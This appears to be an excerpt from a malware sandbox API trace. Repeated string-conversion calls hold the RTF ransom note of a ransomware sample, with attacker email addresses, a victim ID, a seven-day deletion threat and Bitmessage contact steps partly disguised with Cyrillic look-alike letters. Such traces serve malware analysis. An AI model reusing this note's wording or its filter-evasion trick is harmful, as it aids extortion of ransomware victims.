lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w 